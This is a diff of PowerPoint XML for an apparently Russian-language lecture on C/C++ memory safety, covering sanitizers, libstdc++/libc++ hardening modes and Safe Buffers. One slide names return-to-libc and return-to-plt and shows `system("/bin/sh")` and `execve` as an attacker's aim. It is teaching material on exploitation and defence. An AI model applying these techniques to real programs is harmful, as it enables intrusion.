               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>AddressSanitizer</a:t>
+              <a:t>MemorySanitizer</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -10834,7 +11803,7 @@
               <a:t>Работает только в -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US"/>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>O </a:t>
             </a:r>
             <a:r>
@@ -10865,7 +11834,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Компилятор далеко не всегда может вывести допустимый размер указателя из контекста</a:t>
+              <a:t>Компилятор не всегда может вывести допустимый размер указателя из контекста</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -10874,6 +11843,35 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Ограничен рамками функции</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41923CEF-9865-4D75-8B46-BD58786DA149}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>36</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11229,6 +12227,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>37</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -11453,6 +12480,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0FB6480-92D6-48EF-B02F-BB8AF64AB037}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>38</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -11540,6 +12596,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C6C0A0-0464-4965-B137-5A853EE19717}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>39</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -11605,13 +12690,8 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Return-to-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libc</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Return-to-libc</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11664,32 +12744,11 @@
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>execve</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>(“bin/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>”)</a:t>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>execve(“bin/sh”)</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -11704,21 +12763,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>system(“/bin/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>”)</a:t>
+              <a:t>system(“/bin/sh”)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -11729,13 +12774,8 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>return-to-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>plt</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>return-to-plt</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:r>
@@ -11793,6 +12833,35 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC17D26D-89CA-4F95-8365-A89FD4C9A045}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>4</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -12276,35 +13345,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ ./</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>a.out</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> /</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>usr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>/include/</a:t>
+              <a:t>$ ./a.out /usr/include/</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
@@ -12333,6 +13374,35 @@
               </a:rPr>
               <a:t>Aborted</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017A68F7-ED95-4DE4-981C-01EBFEA2510B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>40</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -12411,7 +13481,12 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="820270" y="1825625"/>
+            <a:ext cx="10515600" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
@@ -12435,65 +13510,134 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Всегда включены проверки индексов (а также `front`, `back`, etc.) в std::vector и std::strin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Всегда включены проверки индексов (а также </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>front</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>back</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, etc.) в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>std::vector</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>std::strin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>g</a:t>
             </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Защищают от ошибок </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>buffer overflow</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>GCC:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверки на NULL в умных указателях</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>защита от </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>NULL dereference)</a:t>
+            </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защищают от ошибок </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>buffer overflow</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>GCC:</a:t>
+              <a:t>Проверки корректности параметров мат. функций и распределений</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверки на NULL в умных указателях</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>защита от </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>NULL dereference)</a:t>
+              <a:t>Множество других мелких проверок типа </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>abs(INT_MIN)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> в</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>std::gcd</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверки корректности параметров мат. функций и распределений</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Множество других мелких проверок типа `abs(INT_MIN)` в `std::gcd` и `std::lcm`</a:t>
-            </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
@@ -12562,6 +13706,35 @@
               <a:t>их планируют переписать</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD695C99-A123-46F8-8F64-64F6E4B56338}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>41</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -12722,12 +13895,8 @@
               <a:t>Аналогичная проверка в </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++ </a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>libc++ </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -12812,6 +13981,35 @@
               <a:t>Safe Buffers</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBDB343-30F4-45CE-8575-13B3DB05461B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>42</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -12990,6 +14188,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E484AB3-F470-49DC-8815-3B6B23C92E69}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>43</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -13076,12 +14303,8 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Libstdc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++:</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libstdc++:</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -13121,12 +14344,8 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++: -D_LIBCPP_HARDENING_MODE=...</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Libc++: -D_LIBCPP_HARDENING_MODE=...</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -13157,15 +14376,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++)</a:t>
+              <a:t>=libc++)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -13242,6 +14453,35 @@
               <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA74AC83-3417-44E3-8294-3A7D59F0DCBA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>44</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -13325,6 +14565,35 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FE9ACF1-AFBD-4CE5-92BA-F9A100ADBE01}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>45</a:t>
+            </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
@@ -13797,28 +15066,27 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>$ </a:t>
+              <a:t>$ gcc -O2 repro.c</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ ./</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -O2 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>repro.c</a:t>
+              <a:t>a.out</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
@@ -13835,19 +15103,8 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
